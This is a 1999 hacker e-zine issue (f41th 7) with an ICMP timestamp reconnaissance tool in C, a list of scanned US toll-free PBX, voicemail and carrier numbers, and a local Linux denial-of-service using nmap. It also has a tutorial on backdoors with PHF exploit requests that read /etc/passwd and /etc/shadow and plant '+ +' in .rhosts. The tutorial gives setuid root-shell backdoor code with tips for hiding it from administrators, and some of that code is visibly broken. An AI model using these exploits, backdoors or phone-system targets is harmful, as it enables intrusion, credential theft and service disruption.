[ http://darkcyde.system7.org ] [ http://hybrid.dtmf.org ] yyyyyssssyyyy yyyyssssyyyy yyyy yyyy |lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy :|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$ :||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$ :::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS ::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l .:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::| [ f41th issue 7 - July 1999 ] [ f41th magazine is a production of D4RKCYDE ] [ submissions: hybrid@dtmf.org downtime@webcrunchers.com ] [ mailto: hybrid@dtmf.org downtime@webcrunchers.com ] [ #darkcyde efnet ] PURE FE4R OOO-(z}-|[ F41th 7 Editorial ]--( hybrid )--{z)-|[OOO OOO-(Z}-|[ Chronus ICMP Packet Timestamps ]--( rwxrwxrwx )--{Z)-|[OOO OOO-(z}-|[ US 18OO Random Scan ]--( force )--{z)-|[OOO OOO-(Z}-|[ Local? Linux DoS using nmap ]--( gov-boi )--{Z)-|[OOO OOO-(z}-|[ Impementing Backdoors ]--( msinister )--{z)-|[OOO OOO-(Z}-|[ UK Carrier Scan of O8OO917[XXXX] ]--( faith )--{Z)-|[OOO OOO-(z}-|[ Qpop Trojan Installer ]--( gov-boi )--{z)-|[OOO OOO-(Z}-|[ Rolling Deep ]--( tgb )--{Z)-|[OOO OOO-(z}-|[ 5ESS Compact Digital Exchanges ]--( hybrid )--{z)-|[OOO OOO-(Z}-|[ UK Scan of Exchange O8OO672[XXX] ]--( faith )--{Z)-|[OOO OOO-(z}-|[ SUIDcyde Bugtraq Review ]--( bodie )--{z)-|[OOO OOO-(Z}-|[ DoD Communication networks DMS ]--( hybrid )--{Z)-|[OOO OOO-(z}-|[ ICQ Conspiracy ]--( camel )--{z)-|[OOO OOO-(Z}-|[ Pearl Programming ]--( zomba )--{Z)-|[OOO OOO-(z}-|[ Packet Radio ]--( jasun )--{z)-|[OOO ----------------------------------------------------------------------- D4RKCYDE [hybrid] [downtime] [zomba] [force] * #darkcyde EfNet (no lamerz) [shadowx] [elf] [msinister] [shylock] * http://darkcyde.system7.org [lowtek] [digiphreq] [bodie] [sintax] * hybrid@dtmf.org [nino] [microwire] * downtime@webrunchers.com SHOUTZ [b4b0] [9x] [ch1ckie] [extriad] [kraise] [sonicborg] [jasun] [aktiver] [knight] [siezer] [oeb] [skyper] [typeo] [tgb] [camel] [gov-boi] [rwx] [monty] [phace] [psyclone] [vixen] [port] [mranon] [w1rep41r] [oclet] [l0r1] [ginger] [tip] [milkman] [ph1x] [gr1p] [prez] [network] [lewp] [xio] [backa] [loco] [thewombat] [jd] [spacity] [bind] [lusta] [subzz] [skalar] [voltage] [simmeth] [kryptus] [pbxphreak] [gb] [smiler] [jorge] ----------------------------------------------------------------------- [hybrid-] the king of idle has arrived. *[JaSuN]* Beer, Sand, Rollercoasters, Computers and Communications." hybrids dog pissed on me i'll kill that shitty thing someone give me a quote i cant put at the top of f41th 7 "there can be only one" <[JaSuN]> blasted from the past, out into the future <[JaSuN]> heh <[JaSuN]> "Whats the Infoz? <[JaSuN]> "Gimme the Infoz? elvis has left the building *** ani_slut has quit IRC (Read error: 0 (Error 0)) "30 million nerds communicating with people they don't know, about things they don't understand, for reasons they can't explain." -- Guy Kawasaki, Apple Computer "I have yet to see any pornography on the Internet....mainly because I'm not looking for it. If you're finding for it, you're looking for it. Either quit looking for it or quit complaining about your sucess." -- Don Shorock Usenet is like a herd of performing elephants with diarrhea -- massive, difficult to redirect, awe-inspiring, entertaining, and a source of mind-boggling amounts of excrement when you least expect it. -- Author unknown -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Editorial ]::::::::::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]:::: -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]::::::::::::: Welcome to f41th 7. I can't believe that we have managed to get 3 issues of f41th out in 1 month, getting a zine together is not easy work, it takes alot of time to write the idividual articles in the issue, I'd like to say thanks to everyone that has contributed to this issue and previous issues of f41th.. It's getting better all the time, keep the articles rolling in :) On another note, we have noticed a higher level of .gov and .mil hits on the darkcyde f41th distro sites. For example.. shepherd.hurlburt.af.mil - - [07/Jun/1999:16:49:39 -0500] "GET faith6.txt gw.assist.mil - - [08/Jun/1999:11:33:31 -0500] "GET faith6.txt coni-68.conicit.gov.ve - - [07/Jun/1999:10:26:58 -0500] "GET faith6.txt gsnmail.gov.tw - - [07/Jun/1999:13:57:46 -0500] "GET faith6.txt irmbb66.nigms.nih.gov - - [07/Jun/1999:16:54:49 -0500] "GET faith6.zip operations.dera.gov.uk - - [12/Jun/1999:00:06:28 -0500] "GET faith6.txt dera.gov.uk strikes fjear, goto www.dera.gov.uk to take a look. We've also had hits from various telcos such as Cable&Wireless, and US RBOCs such as USWest and other BELL*.*'s. According to alot of people I have spoken to, dera.gov.uk regualy visit hp sites, and probably database them all.. However, if they wanna read f41th it's upto them, we're not complaining. Sinse the last issue I've noticed alot of servers are mirroring the f41th archives, I'd like to ask if you want to mirror our zine please email me or another darkcyde member so we can list you in the f41th mirrors list. If you want to submit anything to f41th, please email us or me, or comto #darkcyde EFNET, /dcc send hybrid 0d4yz.txt .. peace, enjoy the issue, take it easy. hybrid. -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Chronos ]:::::::[OO--[ by rxwrwxrwx ]---[ rwxrwxrwx@soldier.net ]:: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Chronos ------- Chronos is a tool that can be used to measure the degree of synchronization between hosts. It uses ICMP Timestamp packets to ask those hosts for their actual times (with microsecond precision). Some real-world applications for Chronos include checking whether your NTP- enabled machines are working as expected or not. Also time differences between certain hosts can be dangerous from a security point of view: `slight' delays (in the range or minutes or even less depending on the load of the network/servers) can make it a real pain when tracking things down in logs from those hosts. Another (maybe more useful) way of using chronos is to aid in remotely determining certain characteristics of network topologies like knowing if several different IP addresses correspond to the same physical machine. for example: Non-authoritative answer: Name: random.isp.net Address: 207.201.167.77 Non-authoritative answer: Name: some.ip.alias.of.random.isp.net Address: 209.170.47.7 # ./chronos -l 192.168.1.13 -s 0 -u 500000 207.201.167.77 209.170.47.7 Chronos - measures synchronization between hosts (c) 1999 by 777 Fasten your seat belts, this is gonna hurt!! host == 207.201.167.77 id == 0, seq == 30526, icmp_ttime == 36715519 host == 209.170.47.7 id == 0, seq == 10405, icmp_ttime == 36715522 host == 207.201.167.77 id == 1, seq == 25611, icmp_ttime == 36715852 host == 209.170.47.7 id == 1, seq == 58905, icmp_ttime == 36715970 host == 207.201.167.77 id == 2, seq == 33126, icmp_ttime == 36716350 host == 209.170.47.7 id == 2, seq == 1421, icmp_ttime == 36716460 host == 207.201.167.77 id == 3, seq == 46280, icmp_ttime == 36716851 host == 209.170.47.7 id == 3, seq == 44840, icmp_ttime == 36716854 host == 207.201.167.77 id == 4, seq == 60411, icmp_ttime == 36717350 host == 209.170.47.7 id == 4, seq == 63000, icmp_ttime == 36717460 host == 207.201.167.77 id == 5, seq == 60383, icmp_ttime == 36717850 host == 209.170.47.7 id == 5, seq == 12962, icmp_ttime == 36717853 --- statistics --- These are synchronized. We assume the IP addresses do, in fact, correspond to the same physical machine (which is true for this example) thus allowing us to narrow things down to the key servers of a network. another example: Name: example.com Addresses: 197.77.140.5, 197.77.140.6 Aliases: www.example.com # ./chronos -l 192.168.1.13 -s 0 -u 500000 195.77.240.5 195.77.240.6 Chronos - measures synchronization between hosts (c) 1999 by 777 Fasten your seat belts, this is gonna hurt!! host == 197.77.140.5 id == 0, seq == 5450, icmp_ttime == 44024897 host == 197.77.140.6 id == 0, seq == 55100, icmp_ttime == 36591075 host == 197.77.140.5 id == 1, seq == 24786, icmp_ttime == 44025375 host == 197.77.140.6 id == 1, seq == 35820, icmp_ttime == 36591565 --- statistics --- As you can see these are obviously not in-sync. The code presented here is just a proof of concept and lacks some key routines (like automagickally analysing the results), but it demonstrates the technique. Chronos/Makefile100644 0 0 732 6732275270 12204 0ustar rootroot# Makefile CC = gcc CFLAGS = -D_REENTRANT -Wall -O3 -funroll-loops -finline-functions LIBS = -lpthread OBJS = main.o tstamp.o engine.o stats.o all: chronos chronos: $(OBJS) $(CC) $(CFLAGS) -o chronos $(OBJS) $(LIBS) main.o: main.c engine.h $(CC) $(CFLAGS) -c main.c tstamp.o: tstamp.c tstamp.h $(CC) $(CFLAGS) -c tstamp.c engine.o: engine.c engine.h $(CC) $(CFLAGS) -c engine.c stats.o: stats.c stats.h $(CC) $(CFLAGS) -c stats.c clean: rm -f core chronos *.o Chronos/engine.c100644 0 0 4703 6732274545 12203 0ustar rootroot/* [ e n g i n e . c ] Handles the setting up of timers and scheduling of threads Version: $Id: engine.c,v 1.7 1999/04/28 15:04:18 coder Exp coder $ (c) 1999 by 777 */ #include #include #include #include #include #include #include #include #include #include "engine.h" #include "tstamp.h" int iters = -1; /* number of times we've queried all the hosts */ static void spawn_threads(int signum); static void launch_it(void *arg); int init_timer_interrupt(void) { struct sigaction act; memset(&act, 0, sizeof(act)); act.sa_handler = spawn_threads; act.sa_flags = SA_RESTART; if (sigaction(SIGALRM, &act, NULL) == -1) return -1; else return 0; } int setup_timer(time_t secs, time_t usecs) { struct itimerval timer; timer.it_interval.tv_sec = secs; timer.it_interval.tv_usec = usecs; timer.it_value = timer.it_interval; if (setitimer(ITIMER_REAL, &timer, NULL) == -1) return -1; else return 0; } static void spawn_threads(int signum) { u_int i; int retval; pthread_t worker_tid[nthreads]; pthread_attr_t worker_attr; printf("\n"); ++iters; /* We set our threads' scheduling policy so that they run in realtime and make them detached by default since we don't need their return values */ if (pthread_attr_init(&worker_attr) != 0) { fprintf(stderr, "pthread_attr_init failed\n"); exit(-1); } if (pthread_attr_setdetachstate(&worker_attr, PTHREAD_CREATE_DETACHED) != 0) { fprintf(stderr, "pthread_attr_setdetachstate failed\n"); exit(-1); } if (pthread_attr_setschedpolicy(&worker_attr, SCHED_RR) != 0) { fprintf(stderr, "pthread_attr_setschedpolicy failed\n"); exit(-1); } for (i = 0; i < nthreads; i++) { if ((retval = pthread_create(&worker_tid[i], &worker_attr, (void *) &launch_it, (void *) i)) != 0) { fprintf(stderr, "pthread_create failed\n"); if (retval == EAGAIN) continue; exit(-1); } } if (pthread_attr_destroy(&worker_attr) != 0) { fprintf(stderr, "pthread_attr_destroy failed\n"); exit(-1); } } void launch_it(void *arg) { u_short seqnum; struct timeval tv; gettimeofday(&tv, NULL); srand(tv.tv_usec); seqnum = (rand() % USHRT_MAX); if (timestamp(dest[(u_int) arg], iters, seqnum) == 0) fprintf(stderr, " host == %-15s\tid == %5u, seq == %5u, icmp_ttime == %9s\n", dest[(u_int) arg], (u_short) iters, seqnum, "*failed*"); pthread_exit(NULL); } Chronos/engine.h100644 0 0 1022 6732274571 12176 0ustar rootroot#ifndef _ENGINE_H #define _ENGINE_H /* [ e n g i n e . h ] Handles scheduling of threads and timers Version: $Id: engine.h,v 1.4 1999/04/28 15:04:22 coder Exp coder $ (c) 1999 by 777 */ #include #include #include u_int nthreads; /* number of concurrent working threads */ u_char **dest; /* array with addesses of destination hosts */ extern int init_timer_interrupt(void); extern int setup_timer(time_t secs, time_t usecs); #endif /* _ENGINE_H */ Chronos/in_cksum.c100644 0 0 1107 6711625424 12532 0ustar rootroot/* [ i n _ c k s u m . c ] Version: $Id: in_cksum.c,v 1.1 1999/04/23 17:13:43 coder Exp $ */ #include int in_cksum(u_short *p, int n) { register u_short answer; register long sum = 0; u_short odd_byte = 0; while (n > 1) { sum += *p++; n -= 2; } /* mop up an odd byte, if necessary */ if (n == 1) { *(u_char *) (&odd_byte) = *(u_char *) p; sum += odd_byte; } sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = (int)~sum; /* ones-complement, truncate*/ return (answer); } Chronos/in_cksum.h100644 0 0 346 6711625170 12521 0ustar rootroot#ifndef _IN_CKSUM_H #define _IN_CKSUM_H /* [ i n _ c k s u m . h ] Version: $Id: in_cksum.h,v 1.3 1999/04/23 13:52:35 coder Exp $ */ #include "in_cksum.c" extern int in_cksum(u_short *p, int n); #endif /* _IN_CKSUM_H */ Chronos/main.c100644 0 0 4475 6732275243 11664 0ustar rootroot/* [ m a i n . c ] Glues it all together. Version: $Id: main.c,v 1.1 1999/04/24 16:55:55 coder Exp coder $ (c) 1999 by 777 usage: # ./chronos -l 192.168.1.111 -s 0 -u 500000 `nmap -sP -PI network/24 \ | grep "Host" | cut -f 2 -d '(' | grep "appears to be up" | cut -f 1 -d ')'` */ #include #include #include #include #include #include #include #include "engine.h" #include "stats.h" #include "main.h" extern u_int nthreads; extern u_char **dest; static void usage(char *name); static void banner(void); int main(int argc, char *argv[]) { int i, c; u_char *local_ip = NULL; time_t secs = 1, usecs = 0; /* default interval set to 1 second */ if (geteuid() != 0) fprintf(stderr, "Sorry, you don't have permissions to run this program\n"), exit(-1); if (argc < 2) usage(argv[0]), exit(-1); while((c = getopt(argc, argv, "l:s:u:")) != -1) { switch (c) { case 'l': /* local ip address */ local_ip = strdup(optarg); break; case 's': /* seconds */ secs = strtoul(optarg, NULL, 10); break; case 'u': /* microseconds */ usecs = strtoul(optarg, NULL, 10); break; } } if (inet_aton(local_ip, &local_addr) == -1) perror("inet_aton"), usage(argv[0]), exit(-1); free(local_ip); nthreads = argc - optind; /* copy each ip address passed as command line parameter into an array (which we firstly allocate) */ if ((dest = (u_char **) calloc(nthreads, sizeof(u_char *))) == NULL) perror("calloc"), exit(-1); for (i = 0; i < nthreads; i++) dest[i] = strdup(argv[optind + i]); banner(); if (init_break_interrupt() == -1) fprintf(stderr, "Couldn't setup SIGINT handler\n"), exit(-1); if (init_timer_interrupt() == -1) fprintf(stderr, "Couldn't setup SIGALRM handler\n"), exit(-1); printf("Fasten your seat belts, this is gonna hurt!!\n"); if (setup_timer(secs, usecs) == -1) fprintf(stderr, "Couldn't setup timer\n"), exit(-1); for ( ; ; ); free(dest); exit(0); } void usage(char *name) { banner(); fprintf(stderr, "usage: %s -l [-s ] [-u ] [destination 2] [destination 3] ...\n", name); } void banner(void) { printf("Chronos - measures synchronization between hosts\n"); printf("(c) 1999 by 777 \n"); } Chronos/main.h100644 0 0 517 6711705462 11640 0ustar rootroot#ifndef _MAIN_H #define _MAIN_H /* [ m a i n . c ] Glues it all together. Version: $Id: main.c,v 1.1 1999/04/24 16:55:55 coder Exp coder $ 1999 by 777 */ #include #include #define ARGSIZE (strlen(argv[optind + i]) + 1) struct in_addr local_addr; #endif /* _MAIN_H */ Chronos/stats.c100644 0 0 1360 6732275154 12065 0ustar rootroot/* [ s t a t s . c ] Deals with the analysis and display of the results Version: $Id: stats.c,v 1.1 1999/04/28 15:04:37 coder Exp coder $ (c) 1999 by 777 */ #include #include #include #include #include "engine.h" #include "main.h" static void analyse(int signum); static void show_results(void); int init_break_interrupt(void) { struct sigaction act; memset(&act, 0, sizeof(act)); act.sa_handler = analyse; act.sa_flags = SA_ONESHOT | SA_NOMASK; if (sigaction(SIGINT, &act, NULL) == -1) return -1; else return 0; } static void analyse(int signum) { show_results(); exit(EXIT_SUCCESS); } static void show_results(void) { printf("\n--- statistics ---\n"); } Chronos/stats.h100644 0 0 437 6732275171 12055 0ustar rootroot#ifndef _STATS_H #define _STATS_H /* [ s t a t s . c ] Deals with the analysis and display of the results Version: $Id: stats.h,v 1.1 1999/04/28 15:04:41 coder Exp coder $ (c) 1999 by 777 */ extern int init_break_interrupt(void); #endif /* _STATS_H */ Chronos/tstamp.c100644 0 0 6205 6732274437 12245 0ustar rootroot/* [ t s t a m p . c ] Sends an ICMP Timestamp request and reads the reply Version: $Id: tstamp.c,v 1.10 1999/04/28 15:04:44 coder Exp coder $ (c) 1999 by 777 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "in_cksum.h" #include "tstamp.h" #include "main.h" #define IPHDRSIZE sizeof(struct iphdr) extern struct in_addr local_addr; /* we get this from main.h */ /* sends dst an icmp timestamp request and returns the reply or 0 if it failed */ u_int32_t timestamp(char *dst, u_short id, u_short seq) { int sockfd; struct sockaddr_in src_sa, dst_sa; struct icmp *icmp; struct in_addr dst_addr; char buf[IPHDRSIZE + ICMP_TSLEN]; /* this is the maximum size we'll ever need */ int buflen; /* We open a raw ICMP socket, after that we bind() it to the source address and connect() it to the destination address. Thus we enforce that the kernel passes to the socket only ICMP packets which match the relevant addresses. It also explains why we use send() and recv() instead of sendto() and recvfrom() (we're dealing with connected sockets) */ if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) return 0; if (!(inet_aton(dst, &dst_addr))) { close(sockfd); return 0; } memset(&src_sa, 0, sizeof(struct sockaddr_in)); memset(&dst_sa, 0, sizeof(struct sockaddr_in)); src_sa.sin_family = dst_sa.sin_family = AF_INET; /* we have to explicitly bind our socket to a specific address instead of INADDR_ANY in order to receive correctly icmps sent to aliases ips of ours */ src_sa.sin_addr = local_addr; dst_sa.sin_addr = dst_addr; if (bind(sockfd, (struct sockaddr *) &src_sa, sizeof(struct sockaddr_in)) == -1) { perror("bind"); close(sockfd); return 0; } if (connect(sockfd, (struct sockaddr *) &dst_sa, sizeof(struct sockaddr_in)) == -1) { perror("connect"); close(sockfd); return 0; } /* Next, ICMP Timestamp-request header is built and sent */ memset(buf, 0, sizeof(buf)); icmp = (struct icmp *) buf; icmp->icmp_type = ICMP_TSTAMP; icmp->icmp_code = 0; icmp->icmp_cksum = 0; icmp->icmp_id = id & 0xffff; icmp->icmp_seq = seq & 0xffff; icmp->icmp_otime = (u_int32_t) time(NULL); icmp->icmp_cksum = in_cksum((u_short *) icmp, ICMP_TSLEN); if (send(sockfd, buf, ICMP_TSLEN, 0) == -1) { perror("send"); close(sockfd); return 0; } /* Now it's time to read the reply */ memset(buf, 0, sizeof(buf)); buflen = IPHDRSIZE + ICMP_TSLEN; if (recv(sockfd, buf, buflen, 0) > 0) { icmp = (struct icmp *) (buf + IPHDRSIZE); if ((icmp->icmp_type == ICMP_TSTAMPREPLY) && (icmp->icmp_id == (id & 0xffff)) && (icmp->icmp_seq == (seq & 0xffff))) printf(" host == %-15s\tid == %5u, seq == %5u, icmp_ttime == %9u\n", dst, id, seq, ntohl(icmp->icmp_ttime)); else { close(sockfd); return 0; } } else { close(sockfd); return 0; } id++; seq++; close(sockfd); return (ntohl(icmp->icmp_ttime)); } Chronos/tstamp.h100644 0 0 644 6732274477 12237 0ustar rootroot#ifndef _TSTAMP_H #define _TSTAMP_H /* [ t s t a m p . h ] Sends an ICMP TimeStamp request and handles the reply Version: $Id: tstamp.h,v 1.5 1999/04/27 14:16:04 coder Exp $ (c) 1999 by 777 */ #include /* sends dst an icmp timestamp request and returns the reply or 0 if it failed */ extern u_int32_t timestamp(char *dst, u_short id, u_short seq); #endif /* TSTAMP_H */ -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ 18OO scan ]::::::::[OO--[ by force ]---[ force007@hotmail.com ]:::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 18oo scan by force telco... --oOo--- 622-7380 pbx at&t system network control centre maintanence group 574-6369 mci worldcom paging system 654-3211 us watts enter authorisation code 982-7144 pbx some telco access system 472-1175 v south westen bell 982-7147 pbx north-tech of mci worldcom 829-0030 v mci 829-0026 fax/carrier 220-4818 v mci metro 786-9445 conference calling centre 475-4455 v conf centre passcode please [1-888] 622-6823 pbx at&t service and maintanence single point number [1-888] 333-0879 conf centre carriers... --oOo------ 535-2648 carrier wouldn't connect 567-1745 carrier 232-1249 carrier 232-1968 carrier 232-1863 carrier 599-0262 carrier 599-0861 carrier? continuos carrier/fax tone 599-0477 carrier/fax 599-0298 carrier 321-2403 carrier 321-7468 carrier 321-1542 carrier 321-1173 carrier 321-8619 carrier 321-3756 carrier 321-2780 carrier? weird tone 321-5352 carrier vmbs... --oOo-- 232-1279 vmb lots of options 232-1765 vmb 321-0103 vms mm k-mart resource centre 321-2566 pbx vms dell micro products 321-6909 vms mm 321-8691 pbx vms 466-9222 octel direct 331-1025 vms minneapolis police and fire 2O8-9996 227-O8OO 231-1OOO 285-3222 285-6399 322-5889 345-6323 418-2292 423-585O 433-6245 455-115O 456-1188 466-53OO 466-9222 476-2O44 539-5488 577-9997 667-8424 685-391O 72O-9OO4 72O-9O22 726-2363 746-7766 777-1495 777-17O8 777-6266 777-9633 792-272O 829-OO17 858-3651 868-5995 887-OO11 966-9996 tones... --oOo--- 535-2682 dialtone 321-6228 dialtone [you have dialled an invalid account code] 535-2151 dialtone 232-1777 dialtone [dialled 1800 and it rings somewhere] 232-1282 dialtone [dialled 1800 and it rang a residential number?] 321-6935 dialtone [you have dialled an invalid account code] 321-8593 dialtone 232-1243 beepboop tone 232-1198 beepboop tone 232-1922 beepboop tone 321-6891 beepboop tone 321-0301 beepboop tone 321-5963 beepboop tone 321-9002 beepboop tone 535-2361 tone 535-2456 weird siren tone other... --oOo--- 535-2056 na 837-4391 rec unable to answer at present please try later force... --oOo--- force007@hotmail.com uk vmb o8oo 919355 us vmb 18oo 331o17, 6, 4328 'my middle finger won't go down, how do i wave?' -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ nmap DoS ]::::::::[OO--[ by gov-boi ]---[ hotmetal@hack.co.za]::::: -->[OO]:::::::::::::::::::::::::::::::[ http://www.hack.co.za ]:::::::::::::: subject: (local?) linux DoS using nmap Good day.. I appologize if this is old but seems still to be working/active on my own server. (slackware 4.0.0). I would be interested to know which other distro's this works against. Tested against: slackware 4.0.0 debian 2.1 Redhat 6.0 I became aware of this when local users begun to launch DoS attacks. kernel:~$ nmap 127.[0-255].[0-255].[0-255] -p 21 -sT Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on localhost (127.0.0.1): Port State Protocol Service 21 open tcp ftp Interesting ports on (127.0.0.2): Port State Protocol Service 21 open tcp ftp and it keeps going untill the +/-280th packet.. Interesting ports on (127.0.1.32): Port State Protocol Service 21 open tcp ftp No ports open for host (127.0.1.33) No ports open for host (127.0.1.34) No ports open for host (127.0.1.35) etc.. etc.. I havent tested it on remote machines, but this looks like a tcp/syn flood? Anyhow, local users can shutdown any local daemon running on any port. (apache was the only service that remaining running.) The rest of the other services became unusable/(dead?). Any ideas how one could prevent this? Sorry again if this is old. Regards hotmetal of (src) hotmetal@hack.co.za ( www.hack.co.za ) (e x p l o i t m a t r i x) (world domination in progress) -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Backdoors ]::::::::::::[OO--[ by msinister ]---[ ]:::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: <><><><><><><><><><><><><><><><><> <> <> <> BACK DOORS AND HOW TO <> <> GET ROOTS FROM A NON <> <> ROOTSHELL <> <> <> <> BY: MISTER - SINISTER <> <> <> <><><><><><><><><><><><><><><><><> berfore startin the articale i would to thnk very much to: f0x malder! the leetest hacker/programer i know in the world! (and dont argue!) BACKDOORS: Since hackers have breaked in into systems they wanted to OWEN them meanin: to have access all the time to the system and not havin to hack it every time they want to get in and get root. there are many types of backdoor and i'll discus some of them here and will (hopefuly) show you the reader some ways of makin them and getin root from a simple user shell in some sytem. PASSWORD DOORS A way of gainin access is to get the /etc/passwd or /etc/shadow file and tryin to crack it those givin u the abilty to telnet into the system and enterin as a root. if you have a shell in the system and u do have the prometion to read the file (passwd or shadow) then congrats u have got a new root just take the (with your mouse dont copy the file) root line for example: root:tJWOCaNGtQAtI:0:0:Super-User:/:/usr/local/bin/bash and run on it some kind of a passwd cracker there are alot of this over the internet i'm sure you can find out one. an other way of gainin the PASSWD file is via the knowen bug PHF (it still exist }:) so lets say you have found an host the has PHF and u wanna use it well via PHF u arent exactly root but u have enough to get your hands on the /etc/passwd or /etc/shadow file (not allways but still there is a chance) so here is how you do it: GET /cgi-bin/phf?Qalias=x%0aeval%20cat%20/etc/passwd this line will do this (if u were a user in the system) 14:21 ~root@SINISTER /root [10]# cat /etc/passwd and this line will do this on the system: GET /cgi-bin/phf?Qalias=x%0aeval%20cat%20/etc/shadow 14:21 ~root@SINISTER /root [10]# cat /etc/shadow now after u have gotten the passwd file u know how to gain a root access so here is our first root (hopefuly) THE '+ +' IN .rhosts ROOT here is another way of gainin root also via PHF (or if u have any other way to tryin and echo '+ +' to the .rhosts file) the '+ +' means every one could rlogin into the system with out any passwds (nice heh?) well here is how to do it via PHF: GET /cgi-bin/phf?Qalias=x%0aeval%20echo%20'%2b%20%2b'%20>%20.rhosts this line is equivlent to 14:21 ~root@SINISTER /root [12]# echo '+ +' > .rhosts and if u have managed to echo it then u got a new root all u have to do now is to rlogin into the host (i'm sure u know after u are root in the system what to do :) TELNET BACKDOORS: A telnet backdoor allows to telnet as a root right away when u telnet to a host the inetd listens to the port and then receives the connection and then passes it to in.telnetd and then opens the program login. when doin this the machine checks for things like type of the term (usaly VT100) and then requires authentication hackers have changed it that no authentication will be needed (pretty cool heh?) CRONJOB BACKDOORS A realy cool way of breakin into a system is to tell the crontab to a run a program at a certain time and then u can get into the system for example: 14:36 ~root@SINISTER /root [18]# crontab -l # If you don't want the output of a cron job mailed to you, you have to direct # any output to /dev/null. We'll do this here since these jobs should run # properly on a newly installed system, but if they don't the average newbie # might get quite perplexed about getting strange mail every 5 minutes. :^) # # Run the 'atrun' program every 5 minutes # This runs anything that's due to run from 'at'. See man 'at' or 'atrun'. 0,5,10,15,20,25,30,35,40,45,50,55 * * * * /usr/lib/atrun 1> /dev/null 2> /dev/null # This touches a filename in the temp directory so that you can see cron #is # working if the timestamp is current. Comment it out if it bugs you. :^) # * * * * * touch /tmp/.crond_running we can see that my crontab runs every five minutes a program called 'atrun' into /dev/null in the same way we can tell to the hacked host to run every day at a specific time a program that opens all ports (just a dumb example but u know where i'm gettin to :) HOW TO MAKE A BACKDOOR well now that u know a litle (realllllllly lil) about backdoors lets try to make one our self. here is a simple (probebly useles) but it might some time work :) main() { if (getuid() == /* here enter your UID */) { setuid(0); setgid(0); system("/bin/csh") /* i like C shell more then bash */ } } as u can see what u have told to the computer to do is this: if the user id is mine then plz change my user id and gimme root :) (arent we modest in our requests :) this file should compile on any system but not the same of gettin root :( since it doesnt require any passwd or anythin else it would be a great idea to hide it . (this method is only if u have a shell in a system) lets say i have goten a shell and i want to get root and i also want a passwd ? ok this can be arranged to :) here is an example for a more sufisticated backdoor: main(int argc, char *argv[]) { if (argc != 2) { printf("usage: %s file name\n", argv[0]); exit(1); } /* lets stop here and analyze waht we have dont. * incase the root finds out this file and wants to check it and will type * the name of the file that gives us root all he will get is * > usage: [the name that u called your backdoor] file name * here is a tip dont call your file backdoor :) * ok lets go on with the program */ if (!strcmp(argv[0],"/* enter here your passwd */")) { setuid(0); setgid(0); system("/bin/csh"); } else printf("%s : %s file has been backed!\n", argv[0], argv[1]); } lets see what this will do 14:57 ~Sinister@SINISTER /home/Sinister [26]> gcc -o back backdoor.c 14:57 ~Sinister@SINISTER /home/Sinister [27]> back usage : back file name 14:57 ~Sinister@SINISTER /home/Sinister [28]> back [i entered here the passwd i choosed] #id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) # exit 15:02 ~Sinister@SINISTER /home/Sinister [29]> now lets say the root wants to try it on a file he will allways get this (doesnt matter if the file exist or doesnt exist) 15:02 ~Sinister@SINISTER /home/Sinister [29]>back backdoor.c back : backdoor.c file has been backed! 15:03 ~Sinister@SINISTER /home/Sinister [30]> nice (kinda) if you have more colorful msges to the root like > back /etc/passwd ok dear root u found my back door > then feel free to change :) ok now that we have made a simple backdoor lets go and make somthin nice with a passwd that doesnt shows main(int argc, char *argv[]) { chat PASS[7]; bzero(7,PASS); PASS[0] = 'a'; PASS[1] = 'b'; PASS[2] = 'c'; PASS[3] = 'd'; PASS[4] = 'e'; PASS[5] = 'f'; PASS[6] = 'g'; PASS[7] = 'h'; if (argc != 2) { printf("usage: %s file name\n", argv[0]); exit(1); } if(!strcmp(argv[1], PASS)) { setuid(0); setgid(0); system("/bin/csh"); } else printf (%s : %s file has been backed!\n"); } what we have made is we took our old backdoor and entered an array that holds 8 charcters and (u can change it into more but i think 8 is enough) in this program our passwd is 'abcdefgh' and puted zero's on them using the bzero function those hiding the pass. lets see what does it do: 15:09 ~Sinister@SINISTER /home/Sinister [2]# gcc -o back back.c 15:09 ~Sinister@SINISTER /home/Sinister [3]# back usage: back file name 15:09 ~Sinister@SINISTER /home/Sinister [4]# back abcdefgh #exit 15:09 ~Sinister@SINISTER /root [5]# back back.c back : back.c file has been backed ! 15:09 ~Sinister@SINISTER /home/Sinister [6]# works nice heh? well thats is all for this articale (sux doesnt it :( COMMENT for those who want my cool hand made prompt it is also colorful :) and it is only colorful if u use csh or tcsh shells here it is :) "%S%T%s %U%B~$USER@%m%b%u %B%/%b %U[%h]%u%B%#%b" nice heh ? (well i dont care what u think i like it ! :) till next time have a nice day and enjoy your self see ya later! 11/6/99 -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ O8OO917[XXXX] ]:::::::::::::[OO--[ by faith ]---[ ]:::::::::::::::: 